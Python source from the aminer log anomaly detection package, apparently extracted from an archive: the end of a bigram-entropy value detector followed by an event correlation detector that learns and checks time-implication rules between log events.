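        self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        # Persistence is plain JSON (see do_persist), so loading it cannot execute code. The layout
        # [[first_char, [[second_char, count], ...]], ...] written by do_persist is trusted as-is; a hand-edited or
        # corrupted file would fail here at startup rather than silently load.
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            for elem in persistence_data:
                first_char = elem[0]
                second_char_list = elem[1]
                if first_char not in self.freq:
                    self.freq[first_char] = {}
                for second_char_elem in second_char_list:
                    second_char = second_char_elem[0]
                    frequency = second_char_elem[1]
                    if second_char not in self.freq[first_char]:
                        self.freq[first_char][second_char] = 0
                    # Persisted counts are added to the default table, they do not replace it.
                    self.freq[first_char][second_char] += frequency
        # total_freq[c] = number of observed bigrams starting with c; it is the denominator of P(next | c).
        self.total_freq = {}
        for first_char, second_char_dict in self.freq.items():
            self.total_freq[first_char] = sum(second_char_dict.values())

    @staticmethod
    def _bigrams(value):
        """
        Yield the (first, second) pairs of consecutive characters of value.

        Both ends are padded with the sentinel -1, i.e. the first pair is (-1, value[0]) and the last pair is
        (value[-1], -1); an empty value yields the single pair (-1, -1). For a bytes value the items are ints,
        which matches the int keys of the default frequency table.
        @param value the matched value, indexable and sized.
        """
        for i in range(-1, len(value)):
            first_char = -1 if i == -1 else value[i]
            second_char = -1 if i == len(value) - 1 else value[i + 1]
            yield first_char, second_char

    @staticmethod
    def _value_to_str(value):
        """
        Render a matched value for the anomaly report without ever raising.

        Log content is untrusted input: a value that is not valid text in AminerConfig.ENCODING must not abort
        receive_atom (that would let a crafted log line silence the detector), so such values are reported via repr().
        @param value the matched value (bytes for the usual parser elements; other types are stringified).
        @return a str suitable for the event data.
        """
        if isinstance(value, bytes):
            try:
                return value.decode(AminerConfig.ENCODING)
            except UnicodeError:
                return repr(value)
        return str(value)

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.

        Every value found under target_path_list is scored by the mean bigram probability of its characters (with
        -1 sentinels before and after the value). A mean below prob_thresh raises a 'Value entropy anomaly detected'
        event on all anomaly_event_handlers. In learn mode the frequency table is then extended with the value's
        bigrams. Atoms containing a path from ignore_list, or missing a path from constraint_list, are skipped.
        @param log_atom the log atom to analyze.
        """
        self.log_total += 1
        parser_match = log_atom.parser_match
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False

        # Skip atom when ignore paths in atom or constraint paths not in atom.
        all_paths_set = set(parser_match.get_match_dictionary().keys())
        if len(all_paths_set.intersection(self.ignore_list)) > 0 \
                or len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list):
            return

        # Collect all values found under the target paths. A path may map to a single match or to a list of matches.
        values = []
        all_values_none = True
        for path in self.target_path_list:
            match = parser_match.get_match_dictionary().get(path)
            if match is None:
                continue
            matches = match if isinstance(match, list) else [match]
            for single_match in matches:
                value = single_match.match_object
                # None values are dropped here so that len(value) below never sees them.
                if value is not None:
                    all_values_none = False
                    values.append(value)
        if all_values_none is True:
            return

        # match_object is expected to be bytes (the default table is keyed by byte values); other sized types are
        # scored but will rarely hit the table — TODO confirm against the parser elements used with this detector.
        for value in values:
            probs = []
            for first_char, second_char in self._bigrams(value):
                prob = 0
                if first_char in self.freq and second_char in self.freq[first_char]:
                    prob = self.freq[first_char][second_char] / self.total_freq[first_char]
                probs.append(prob)
            # _bigrams yields at least one pair, so this division is safe.
            critical_val = sum(probs) / len(probs)
            if critical_val < self.prob_thresh:
                try:
                    data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                except UnicodeError:
                    data = repr(log_atom.raw_data)
                if self.output_logline:
                    original_log_line_prefix = self.aminer_config.config_properties.get(
                        CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                    sorted_log_lines = [log_atom.parser_match.match_element.annotate_match('') + os.linesep +
                                        original_log_line_prefix + data]
                else:
                    sorted_log_lines = [data]
                analysis_component = {'AffectedLogAtomPaths': self.target_path_list,
                                      # Decoding is guarded: an undecodable value is reported, not raised.
                                      'AffectedLogAtomValues': [self._value_to_str(value)],
                                      'CriticalValue': critical_val,
                                      'ProbabilityThreshold': self.prob_thresh}
                event_data = {'AnalysisComponent': analysis_component}
                for listener in self.anomaly_event_handlers:
                    listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Value entropy anomaly detected',
                                           sorted_log_lines, event_data, log_atom, self)

        # Extend frequency table if learn mode is active.
        if self.learn_mode is True:
            for value in values:
                if self.skip_repetitions is True:
                    # Do not consider repeating values multiple times for extending frequency table to avoid distortions.
                    # NOTE(review): value_set is never pruned, so a stream of unique values grows it without bound while
                    # learning is active; stop_learning_time bounds this in practice — confirm for long-lived deployments.
                    if value in self.value_set:
                        continue
                    self.value_set.add(value)
                for first_char, second_char in self._bigrams(value):
                    if first_char in self.freq:
                        self.total_freq[first_char] += 1
                        self.freq[first_char][second_char] = self.freq[first_char].get(second_char, 0) + 1
                    else:
                        self.total_freq[first_char] = 1
                        self.freq[first_char] = {second_char: 1}
            # Each learned atom pushes the no-anomaly learning deadline forward.
            if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time
        self.log_success += 1

    def do_timer(self, trigger_time):
        """
        Check if current ruleset should be persisted.

        @param trigger_time the time at which the timer fired.
        @return the number of seconds until the next persistence is due.
        """
        if self.next_persist_time is None:
            return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        delta = self.next_persist_time - trigger_time
        if delta <= 0:
            self.do_persist()
            delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
            self.next_persist_time = time.time() + delta
        return delta

    def do_persist(self):
        """
        Immediately write persistence data to storage.

        The frequency table is serialized as JSON in the form [[first_char, [[second_char, count], ...]], ...];
        the list-of-lists layout keeps the int keys intact (JSON object keys would become strings).
        """
        lst = []
        for first_char, second_char_elem in self.freq.items():
            sublst = [[second_char, frequency] for second_char, frequency in second_char_elem.items()]
            lst.append([first_char, sublst])
        PersistenceUtil.store_json(self.persistence_file_name, lst)
        logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__)

    def allowlist_event(self, event_type, event_data, allowlisting_data):
        """
        Allowlist an event generated by this source using the information emitted when generating the event.

        The given parser path is added to constraint_list, so only atoms containing it are analyzed from now on.
        @param event_type must be the event type emitted by this class.
        @param event_data the parser path (str) to add to constraint_list.
        @param allowlisting_data not supported by this detector; must be None.
        @return a message with information about allowlisting
        @throws Exception when allowlisting of this special event using given allowlisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if allowlisting_data is not None:
            msg = 'Allowlisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # constraint_list is used in set.intersection() on every atom; an unhashable entry would make every later
        # receive_atom call fail, so reject anything that is not a path string here instead.
        if not isinstance(event_data, str):
            msg = 'Event data must be a parser path string'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.constraint_list:
            self.constraint_list.append(event_data)
        return f'Allowlisted path {event_data}.'

    def blocklist_event(self, event_type, event_data, blocklisting_data):
        """
        Blocklist an event generated by this source using the information emitted when generating the event.

        The given parser path is added to ignore_list, so atoms containing it are skipped from now on.
        @param event_type must be the event type emitted by this class.
        @param event_data the parser path (str) to add to ignore_list.
        @param blocklisting_data not supported by this detector; must be None.
        @return a message with information about blocklisting
        @throws Exception when blocklisting of this special event using given blocklisting_data was not possible.
        """
        if event_type != f'Analysis.{self.__class__.__name__}':
            msg = 'Event not from this source'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if blocklisting_data is not None:
            msg = 'Blocklisting data not understood by this detector'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        # Same reasoning as in allowlist_event: ignore_list must stay a list of hashable path strings.
        if not isinstance(event_data, str):
            msg = 'Event data must be a parser path string'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        if event_data not in self.ignore_list:
            self.ignore_list.append(event_data)
        return f'Blocklisted path {event_data}.'

    def log_statistics(self, component_name):
        """
        Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler.

        @param component_name the name of the component which is printed in the log line.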
""" if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EventCorrelationDetector.py000066400000000000000000001450261437606560100363120ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines an evaluator and generator for event rules. The overall idea of generation is 1) For each processed event A, randomly select another event B occurring within queue_delta_time. 2) If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3) Observe for a long time (max_observations) whether the hypothesis holds. 4) If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
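"""
from collections import deque
import random
import math
import time
import logging
from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\
    STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.events.EventInterfaces import EventSourceInterface
from aminer.input.InputInterfaces import AtomHandlerInterface
from aminer.util import PersistenceUtil
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface


class EventCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface):
    """
    This class tries to find time correlation patterns between different log atom events.

    An event is either the tuple of all parser paths of a log atom (empty target_path_list) or the tuple of values found at
    the paths in target_path_list. Forward hypotheses (A => B: B follows A within hypothesis_max_delta_time) and back
    hypotheses (B <= A: B preceded A within hypothesis_max_delta_time) are generated from recently seen candidate events,
    evaluated over max_observations and promoted to rules once they are statistically stable. With check_rules_flag the
    rules are re-evaluated on incoming atoms and a violated rule is reported to the anomaly event handlers.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, max_hypotheses=1000, hypothesis_max_delta_time=5.0,
                 generation_probability=1.0, generation_factor=1.0, max_observations=500, p0=0.9, alpha=0.05, candidates_size=10,
                 hypotheses_eval_delta_time=120.0, delta_time_to_discard_hypothesis=180.0, check_rules_flag=False, learn_mode=True,
                 ignore_list=None, persistence_id='Default', output_logline=True, constraint_list=None, stop_learning_time=None,
                 stop_learning_no_anomaly_time=None):
        """
        Initialize the detector. This will also trigger reading or creation of persistence storage location.
        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths
        are considered for value range generation.
        @param max_hypotheses maximum amount of hypotheses and rules hold in memory.
        @param hypothesis_max_delta_time time span of events considered for hypothesis generation.
        @param generation_probability probability in [0, 1] that the currently processed log line is added to the set of candidates
        used for hypothesis generation (see receive_atom, "Add new hypothesis candidates").
        @param generation_factor probability in [0, 1] that the currently processed log line is paired with each of the stored
        candidates to form new hypotheses (see receive_atom, "Generate new hypotheses").
        @param max_observations maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is
        evaluated.
        @param p0 expected value for hypothesis evaluation distribution.
        @param alpha confidence value for hypothesis evaluation.
        @param candidates_size maximum number of stored candidates used for hypothesis generation.
        @param hypotheses_eval_delta_time duration between hypothesis evaluation phases that remove old hypotheses that are likely to
        remain unused.
        @param delta_time_to_discard_hypothesis time span required for old hypotheses to be discarded.
        @param check_rules_flag specifies whether existing rules are evaluated.
        @param learn_mode specifies whether new hypotheses are generated.
        @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are
        omitted. The default value is [] as None is not iterable.
        @param persistence_id name of persistence file.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param constraint_list list of paths; only used when target_path_list is empty. If non-empty, a log atom is only considered
        when at least one of these paths is present in its match dictionary. The default value is [] as None is not iterable.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        """
        # avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5
        super().__init__(
            mutable_default_args=["target_path_list", "ignore_list", "constraint_list"], aminer_config=aminer_config,
            anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, max_hypotheses=max_hypotheses,
            hypothesis_max_delta_time=hypothesis_max_delta_time, generation_probability=generation_probability,
            generation_factor=generation_factor, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size,
            hypotheses_eval_delta_time=hypotheses_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis,
            check_rules_flag=check_rules_flag, learn_mode=learn_mode, ignore_list=ignore_list, persistence_id=persistence_id,
            output_logline=output_logline, constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time
        )
        self.last_unhandled_match = None
        self.total_records = 0
        # Hypotheses under evaluation. The plain dicts map trigger_event -> [Implication], the *_inv dicts map
        # implied_event -> [Implication], so both sides of an implication can be looked up by the event that just arrived.
        self.forward_hypotheses = {}
        self.back_hypotheses = {}
        self.forward_hypotheses_inv = {}
        self.back_hypotheses_inv = {}
        self.last_hypotheses_eval_timestamp = -1.0
        # Queues of implications whose trigger fired and whose resolution (or timeout) is still pending, in trigger order.
        self.forward_rule_queue = deque([])
        self.back_rule_queue = deque([])
        self.forward_hypotheses_queue = deque([])
        self.back_hypotheses_queue = deque([])
        # Recently seen (log_event, atom_time) pairs that new hypotheses are built from.
        self.hypothesis_candidates = deque([])
        self.sum_unstable_unknown_hypotheses = 0
        self.last_event_occurrence = {}
        # Cache for get_min_eval_true, keyed by (max_observations, p0, alpha).
        self.min_eval_true_dict = {}
        self.min_eval_true_dict_max_size = 1000
        # Last raw log line seen per event, used to make anomaly output readable.
        self.sample_events = {}
        # Learned rules, same key layout as the hypothesis dicts.
        self.back_rules = {}
        self.forward_rules = {}
        self.back_rules_inv = {}
        self.forward_rules_inv = {}
        # Compute the initial minimum amount of positive evaluations for hypotheses to become rules.
        # For rules, this value can be different and will be computed based on the sample observations.
        self.min_eval_true = self.get_min_eval_true(self.max_observations, self.p0, self.alpha)
        # Counters and lists reported by log_statistics and reset there.
        self.log_forward_rules_learned = 0
        self.log_back_rules_learned = 0
        self.log_new_forward_rules = []
        self.log_new_back_rules = []
        self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id)
        PersistenceUtil.add_persistable_component(self)
        self.persistence_id = persistence_id
        persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
        if persistence_data is not None:
            # Each record is [direction, trigger_event, implied_event, max_observations, min_eval_true] as written by do_persist.
            for record in persistence_data:
                implication_direction = record[0]
                trigger_event = tuple(record[1])
                implied_event = tuple(record[2])
                max_obs = record[3]
                min_eval_t = record[4]
                rule = Implication(trigger_event, implied_event, None, max_obs, min_eval_t)
                # Persisted implications are rules already; mark them stable so they are never treated as hypotheses.
                rule.stable = 1
                if implication_direction == 'back':
                    self.back_rules.setdefault(trigger_event, []).append(rule)
                    self.back_rules_inv.setdefault(implied_event, []).append(rule)
                elif implication_direction == 'forward':
                    self.forward_rules.setdefault(trigger_event, []).append(rule)
                    self.forward_rules_inv.setdefault(implied_event, []).append(rule)
            logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__)

    # skipcq: PYL-R1710
    def get_min_eval_true(self, max_observations, p0, alpha):
        """
        Compute the critical value (minimal amount of true evaluations) for a hypothesis.
        The form of the hypothesis is <trigger> implies <implied> with at least probability p0 to be accepted.

        The number of failed evaluations is modelled as Binomial(max_observations, 1 - p0); the loop finds the smallest
        failure count i whose cumulative probability exceeds (1 - alpha) and returns max_observations - i.
        This method tries to be efficient by
        - Storing already computed critical values in a dictionary
        - Swapping (1 - p0) and p0 and replace alpha with (1 - alpha) to reduce loops
        @param max_observations number of evaluations a hypothesis receives.
        @param p0 assumed probability that a single evaluation of a valid hypothesis is true.
        @param alpha significance level.
        @return the minimal number of true evaluations, or None if the cumulative probability never exceeds (1 - alpha)
        (e.g. for alpha <= 0); the skipcq marker above acknowledges the missing return on that path.
        """
        if (max_observations, p0, alpha) in self.min_eval_true_dict:
            return self.min_eval_true_dict[(max_observations, p0, alpha)]
        sum1 = 0.0
        max_observations_factorial = math.factorial(max_observations)
        i_factorial = 1
        for i in range(max_observations + 1):
            i_factorial = i_factorial * max(i, 1)
            # The factorials are kept as exact ints (they do not fit a float); the single true division then yields the
            # binomial coefficient as a float.
            sum1 = sum1 + max_observations_factorial / (i_factorial * math.factorial(max_observations - i)) * ((1 - p0) ** i) * (
                p0 ** (max_observations - i))
            if sum1 > (1 - alpha):
                if len(self.min_eval_true_dict) <= self.min_eval_true_dict_max_size:
                    # Store common values for fast retrieval
                    self.min_eval_true_dict[(max_observations, p0, alpha)] = max_observations - i
                return max_observations - i

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.

        Derives the event of the atom, then (with check_rules_flag) evaluates the learned rules against it and (with learn_mode)
        evaluates pending hypotheses, promotes stable ones to rules, generates new hypotheses from the candidate queue and
        periodically discards stale hypotheses.
        @param log_atom the log atom to process; its atom_time is set to the current time when it carries no timestamp.
        """
        self.log_total += 1
        if log_atom.get_timestamp() is None:
            log_atom.atom_time = time.time()
        if self.learn_mode is True and self.stop_learning_timestamp is not None and \
                self.stop_learning_timestamp < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
            self.learn_mode = False
        parser_match = log_atom.parser_match
        self.total_records += 1
        # Skip paths from ignore_list.
        for ignore_path in self.ignore_list:
            if ignore_path in parser_match.get_match_dictionary():
                return
        if self.target_path_list is None or len(self.target_path_list) == 0:
            # Event is defined by the full path of log atom.
            constraint_path_flag = False
            for constraint_path in self.constraint_list:
                if parser_match.get_match_dictionary().get(constraint_path) is not None:
                    constraint_path_flag = True
                    break
            if not constraint_path_flag and self.constraint_list != []:
                return
            log_event = tuple(parser_match.get_match_dictionary())
        else:
            # Event is defined by value combos in target_path_list
            values = []
            all_values_none = True
            for path in self.target_path_list:
                match = parser_match.get_match_dictionary().get(path)
                if match is None:
                    continue
                matches = []
                if isinstance(match, list):
                    matches = match
                else:
                    matches.append(match)
                for match in matches:
                    if isinstance(match.match_object, bytes):
                        value = match.match_object.decode(AminerConfig.ENCODING)
                    else:
                        value = str(match.match_object)
                    # value is always a str here, so all_values_none ends up False as soon as any target path matched.
                    if value is not None:
                        all_values_none = False
                    values.append(value)
            if all_values_none is True:
                return
            log_event = tuple(values)
        # Store last seen sample event to improve output.
        self.sample_events[log_event] = log_atom.raw_data
        if self.check_rules_flag:
            # Only check rules without generating new hypotheses.
            # Trigger implication A => B when A occurs.
            if log_event in self.forward_rules:
                for rule in self.forward_rules[log_event]:
                    rule.rule_trigger_timestamps.append(log_atom.atom_time)
                    self.forward_rule_queue.append(rule)
            # Resolve triggered implication A => B when B occurs.
            if log_event in self.forward_rules_inv:
                for rule in self.forward_rules_inv[log_event]:
                    # Find first non-observed trigger timestamp
                    trigger_timestamp_index = -1
                    for trigger_timestamp in rule.rule_trigger_timestamps:
                        trigger_timestamp_index += 1
                        if trigger_timestamp != 'obs':
                            break
                    if trigger_timestamp_index != -1 and \
                            rule.rule_trigger_timestamps[trigger_timestamp_index] != 'obs' and \
                            rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time:
                        # Implication was triggered; append positive evaluation and mark as seen.
                        rule.add_rule_observation(1)
                        rule.rule_trigger_timestamps[trigger_timestamp_index] = 'obs'
            # Clean up triggered/resolved implications.
            while len(self.forward_rule_queue) > 0:
                rule = self.forward_rule_queue[0]
                if len(rule.rule_trigger_timestamps) == 0:
                    # Triggered timestamp was already deleted somewhere else.
                    self.forward_rule_queue.popleft()
                    continue
                if rule.rule_trigger_timestamps[0] == 'obs':
                    # Remove triggered timestamp.
                    rule.rule_trigger_timestamps.popleft()
                    self.forward_rule_queue.popleft()
                    continue
                if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time:
                    # Too much time has elapsed; append negative evaluation.
                    rule.add_rule_observation(0)
                    rule.rule_trigger_timestamps.popleft()
                    self.forward_rule_queue.popleft()
                    if not rule.evaluate_rule():
                        # Rule violated: report the missing implied event to all handlers and restart the observation window.
                        try:
                            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                        except UnicodeError:
                            data = repr(log_atom.raw_data)
                        original_log_line_prefix = self.aminer_config.config_properties.get(
                            CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                        tmp_string = f'Rule: {str(rule.trigger_event)} -> {str(rule.implied_event)}\n Expected: ' \
                                     f'{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: ' \
                                     f'{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}'
                        if self.output_logline:
                            sorted_log_lines = [tmp_string + '\n' + original_log_line_prefix + data]
                        else:
                            sorted_log_lines = [tmp_string + data]
                        for listener in self.anomaly_event_handlers:
                            implied_event = None
                            trigger_event = None
                            if rule.implied_event in self.sample_events:
                                implied_event = self.sample_events[rule.implied_event]
                            if rule.trigger_event in self.sample_events:
                                trigger_event = self.sample_events[rule.trigger_event]
                            listener.receive_event(
                                'analysis.EventCorrelationDetector',
                                f'Correlation rule violated! Event {repr(implied_event)} is missing, but should follow event '
                                f'{repr(trigger_event)}', sorted_log_lines,
                                {'RuleInfo': {'Rule': str(rule.trigger_event) + '->' + str(rule.implied_event),
                                              'Expected': str(rule.min_eval_true) + '/' + str(rule.max_observations),
                                              'Observed': str(sum(rule.rule_observations)) + '/' + str(len(rule.rule_observations))}},
                                log_atom, self)
                        rule.rule_observations = deque([])
                    continue
                break
            # Trigger implication B <= A when B occurs.
            if log_event in self.back_rules_inv:
                for rule in self.back_rules_inv[log_event]:
                    rule.rule_trigger_timestamps.append(log_atom.atom_time)
                    self.back_rule_queue.append(rule)
            # Resolve triggered implication B <= A when A occurs.
            if log_event in self.back_rules:
                for rule in self.back_rules[log_event]:
                    # Find first non-observed trigger timestamp
                    trigger_timestamp_index = -1
                    for trigger_timestamp in rule.rule_trigger_timestamps:
                        trigger_timestamp_index += 1
                        if trigger_timestamp != 'obs':
                            break
                    if trigger_timestamp_index != -1 and \
                            rule.rule_trigger_timestamps[trigger_timestamp_index] != 'obs' and \
                            rule.rule_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - self.hypothesis_max_delta_time:
                        rule.add_rule_observation(1)
                        rule.rule_trigger_timestamps[trigger_timestamp_index] = 'obs'
                    else:
                        # A occurred without a recent B: negative evaluation for B <= A.
                        rule.add_rule_observation(0)
                    if not rule.evaluate_rule():
                        try:
                            data = log_atom.raw_data.decode(AminerConfig.ENCODING)
                        except UnicodeError:
                            data = repr(log_atom.raw_data)
                        original_log_line_prefix = self.aminer_config.config_properties.get(
                            CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
                        tmp_string = f'Rule: {str(rule.implied_event)} <- {str(rule.trigger_event)}\n Expected: ' \
                                     f'{str(rule.min_eval_true)}/{str(rule.max_observations)}\n Observed: ' \
                                     f'{str(sum(rule.rule_observations))}/{str(len(rule.rule_observations))}'
                        if self.output_logline:
                            sorted_log_lines = [tmp_string + '\n' + original_log_line_prefix + data]
                        else:
                            sorted_log_lines = [tmp_string + data]
                        for listener in self.anomaly_event_handlers:
                            implied_event = None
                            trigger_event = None
                            if rule.implied_event in self.sample_events:
                                implied_event = self.sample_events[rule.implied_event]
                            if rule.trigger_event in self.sample_events:
                                trigger_event = self.sample_events[rule.trigger_event]
                            listener.receive_event(
                                'analysis.EventCorrelationDetector',
                                f'Correlation rule violated! Event {repr(implied_event)} is missing, but should precede event '
                                f'{repr(trigger_event)}', sorted_log_lines,
                                {'RuleInfo': {'Rule': str(rule.implied_event) + '<-' + str(rule.trigger_event),
                                              'Expected': str(rule.min_eval_true) + '/' + str(rule.max_observations),
                                              'Observed': str(sum(rule.rule_observations)) + '/' + str(len(rule.rule_observations))}},
                                log_atom, self)
                        rule.rule_observations = deque([])
            # Clean up triggered/resolved implications.
            while len(self.back_rule_queue) > 0:
                rule = self.back_rule_queue[0]
                if len(rule.rule_trigger_timestamps) == 0:
                    self.back_rule_queue.popleft()
                    continue
                if rule.rule_trigger_timestamps[0] == 'obs':
                    rule.rule_trigger_timestamps.popleft()
                    self.back_rule_queue.popleft()
                    continue
                if rule.rule_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time:
                    rule.rule_trigger_timestamps.popleft()
                    self.back_rule_queue.popleft()
                    continue
                break
        if self.learn_mode:
            # Generate new hypotheses and rules.
            # Keep track of event occurrences, relevant for removing old hypotheses.
            self.last_event_occurrence[log_event] = log_atom.atom_time
            # Trigger implication A => B when A occurs.
            if log_event in self.forward_hypotheses:
                for implication in self.forward_hypotheses[log_event]:
                    if implication.stable == 0:
                        implication.hypothesis_trigger_timestamps.append(log_atom.atom_time)
                        self.forward_hypotheses_queue.append(implication)
            # Resolve triggered implication A => B when B occurs.
            if log_event in self.forward_hypotheses_inv:
                delete_hypotheses = []
                for implication in self.forward_hypotheses_inv[log_event]:
                    # Find first non-observed trigger timestamp
                    trigger_timestamp_index = -1
                    for trigger_timestamp in implication.hypothesis_trigger_timestamps:
                        trigger_timestamp_index += 1
                        if trigger_timestamp != 'obs':
                            break
                    if trigger_timestamp_index != -1 and \
                            str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != 'obs' and \
                            implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \
                            self.hypothesis_max_delta_time and \
                            implication.stable == 0:
                        implication.add_hypothesis_observation(1, log_atom.atom_time)
                        # Mark this timestamp as observed
                        implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = 'obs'
                        # Since only true observations occur here, check for instability not necessary.
                        if implication.compute_hypothesis_stability() == 1:
                            # Update p and min_eval_true according to the results in the sample.
                            p = implication.hypothesis_evaluated_true / implication.hypothesis_observations
                            implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha)
                            # Add hypothesis to rules.
                            if implication.trigger_event in self.forward_rules:
                                self.forward_rules[implication.trigger_event].append(implication)
                                self.log_forward_rules_learned += 1
                                self.log_new_forward_rules.append(implication)
                            else:
                                self.forward_rules[implication.trigger_event] = [implication]
                                self.log_forward_rules_learned += 1
                                self.log_new_forward_rules.append(implication)
                            if implication.implied_event in self.forward_rules_inv:
                                self.forward_rules_inv[implication.implied_event].append(implication)
                            else:
                                self.forward_rules_inv[implication.implied_event] = [implication]
                            # Drop time stamps of previous observations, start new observations for rule.
                            implication.hypothesis_trigger_timestamps.clear()
                            self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                            # Remove implication from list of hypotheses.
                            self.forward_hypotheses[implication.trigger_event].remove(implication)
                            delete_hypotheses.append(implication)
                # Deferred removal: the list being iterated above must not be modified in place.
                for delete_hypothesis in delete_hypotheses:
                    self.forward_hypotheses_inv[log_event].remove(delete_hypothesis)
            # Clean up triggered/resolved implications.
            while len(self.forward_hypotheses_queue) > 0:
                implication = self.forward_hypotheses_queue[0]
                if len(implication.hypothesis_trigger_timestamps) == 0:
                    # Triggered timestamp was already deleted somewhere else.
                    self.forward_hypotheses_queue.popleft()
                    continue
                if implication.hypothesis_trigger_timestamps[0] == 'obs':
                    # Remove triggered timestamp.
                    implication.hypothesis_trigger_timestamps.popleft()
                    self.forward_hypotheses_queue.popleft()
                    continue
                if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time:
                    # Too much time has elapsed; append negative evaluation.
                    implication.hypothesis_trigger_timestamps.popleft()
                    implication.add_hypothesis_observation(0, log_atom.atom_time)
                    if implication.compute_hypothesis_stability() == -1 and implication.trigger_event in self.forward_hypotheses and \
                            implication in self.forward_hypotheses[implication.trigger_event]:
                        # This check is required if a hypothesis was already removed, but triggered hypotheses are still in the queue.
                        self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1
                        self.forward_hypotheses[implication.trigger_event].remove(implication)
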